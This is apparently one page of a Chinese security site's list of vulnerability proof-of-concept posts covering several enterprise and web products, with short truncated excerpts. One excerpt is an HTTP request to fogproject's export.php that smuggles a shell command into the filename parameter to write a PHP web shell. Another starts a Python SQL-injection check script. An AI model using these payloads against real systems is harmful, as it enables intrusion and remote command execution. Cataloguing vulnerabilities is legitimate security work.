POC 第37页
【通用】 nginxWebUI getAuth 命令执行_秃兔安全

【通用】 nginxWebUI getAuth 命令执行

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证    
fogproject系统接口export.php存在远程命令执行漏洞_秃兔安全

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
秃兔的头像_秃兔安全至尊玉兔秃兔8个月前
0715
同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞_秃兔安全
金和OAC6-FileDownLoad.aspx任意文件读取漏洞_秃兔安全
⻜企互联loginService任意登录_秃兔安全
捷诚管理信息系统 SQL注入漏洞_秃兔安全

捷诚管理信息系统 SQL注入漏洞

import timeimport requests def verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx’headers = { 登录可见余下内容
秃兔的头像_秃兔安全至尊玉兔秃兔8个月前
0955
金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞_秃兔安全
蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入_秃兔安全
【通用】 Craft CMS模板注入导致RCE(CVE-2024-56145)_秃兔安全

【通用】 Craft CMS模板注入导致RCE(CVE-2024-56145)

fofa语句yakit插件 uuidnuclei yaml只写了快速检验是否存疑的脚本,具体的利用方式在网上可以找得到。 
dreamer292的头像_秃兔安全至尊玉兔dreamer2928个月前
0897
【通用】Scan2Net平台 远程命令执行漏洞(CVE-2024-28138)_秃兔安全